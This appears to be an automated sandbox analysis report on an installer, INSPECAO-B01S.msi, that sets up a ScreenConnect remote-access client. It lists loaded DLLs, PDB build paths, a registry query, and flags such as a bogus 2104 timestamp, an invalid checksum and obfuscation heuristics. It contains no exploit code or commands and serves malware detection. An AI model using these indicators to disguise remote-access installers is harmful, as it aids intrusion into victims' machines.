Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: INSPECAO-B01S.msi

Static file information: File size 8249344 > 1048576

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2943982681.000000001B052000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1723474974.0000000000EAD000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.000000000131B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: INSPECAO-B01S.msi, MSI15E7.tmp.1.dr, MSI1608.tmp.1.dr, MSI17AE.tmp.1.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr, 4c1433.rbs.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: INSPECAO-B01S.msi, MSIBC6.tmp.0.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940504221.0000000002142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr

Binary contains a suspicious time stamp

Source: ScreenConnect.Client.dll.1.dr

Static PE information: 0xFC256B87 [Sun Jan 20 22:19:51 2104 UTC]

PE file contains an invalid checksum

Source: MSIBC6.tmp.0.dr

Static PE information: real checksum: 0x2f213 should be: 0x111c03

PE file contains sections with non-standard names

Source: ScreenConnect.WindowsAuthenticationPackage.dll.1.dr	Static PE information: section name: _RDATA
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E38400 push es; ret	3_3_06E38410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E329A0 push es; ret	3_3_06E329B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377E8 push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377EC push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E37F3C push es; ret	3_3_06E37F40
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C91F push eax; retf 0004h	6_2_0455C92A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C90F push eax; retf 0004h	6_2_0455C91A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455CA1F push ebx; retf 0004h	6_2_0455CA3A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_04556AB5 push esp; iretd	6_2_04556AB9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD50 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD40 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05725DE8 push eax; mov dword ptr [esp], ecx	6_2_05725E11
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9D0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9C0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05B30F81 pushad ; ret	6_2_05B30F93
